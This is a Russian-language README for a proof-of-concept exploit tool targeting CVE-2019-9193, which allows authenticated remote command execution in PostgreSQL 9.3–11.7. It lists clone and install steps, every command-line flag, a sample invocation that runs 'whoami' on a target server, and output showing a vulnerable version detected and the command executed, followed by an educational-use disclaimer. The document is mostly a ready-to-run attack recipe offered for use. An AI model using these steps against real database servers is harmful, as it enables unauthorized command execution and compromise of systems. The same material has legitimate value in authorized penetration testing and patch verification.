
это PoC-инструмент, предназначенный для эксплуатации аутентифицированной уязвимости удалённого выполнения кода (RCE) в определённых версиях PostgreSQL (9.3 - 11.7)
GenPostgresRCEExploit — это PoC-инструмент для эксплуатации аутентифицированной уязвимости удаленного выполнения кода (RCE) в определенных версиях PostgreSQL (9.3 – 11.7). Он позволяет аутентифицированным пользователям выполнять системные команды на сервере базы данных PostgreSQL, уязвимом к CVE-2019-9193.
psycopg2)git clone https://github.com/geniuszly/CVE-2019-9193
cd CVE-2019-9193
pip install -r requirements.txt
python3 GenPostgresRCEExploit.py -i <целевой_ip> -p <порт> -d <имя_базы_данных> -U <имя_пользователя> -P <пароль> -c "<системная_команда>"
-i, --ip: IP-адрес сервера PostgreSQL (по умолчанию: 127.0.0.1)-p, --port: Порт сервера PostgreSQL (по умолчанию: 5432)-d, --database: Имя базы данных PostgreSQL (по умолчанию: template1)-U, --user: Имя пользователя для подключения к серверу PostgreSQL (по умолчанию: postgres)-P, --password: Пароль для подключения к серверу PostgreSQL (по умолчанию: postgres)-c, --command: Системная команда для выполнения на сервере-t, --timeout: Тайм-аут подключения в секундах (по умолчанию: 10)python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
Этот пример подключается к серверу PostgreSQL по адресу 192.168.1.10, аутентифицируется с указанными учетными данными и выполняет команду whoami.
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"
[+] Подключение к базе данных PostgreSQL на 192.168.1.10:5432
[+] Соединение успешно установлено
[+] Проверка версии PostgreSQL
[+] Уязвимая версия PostgreSQL обнаружена: 10.4
[+] Создание временной таблицы: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Команда успешно выполнена
postgres
Данный инструмент предназначен только для образовательных целей и этического тестирования. Несанкционированное использование этого инструмента против любых систем незаконно и строго запрещено. Авторы не несут ответственности за любое неправомерное использование.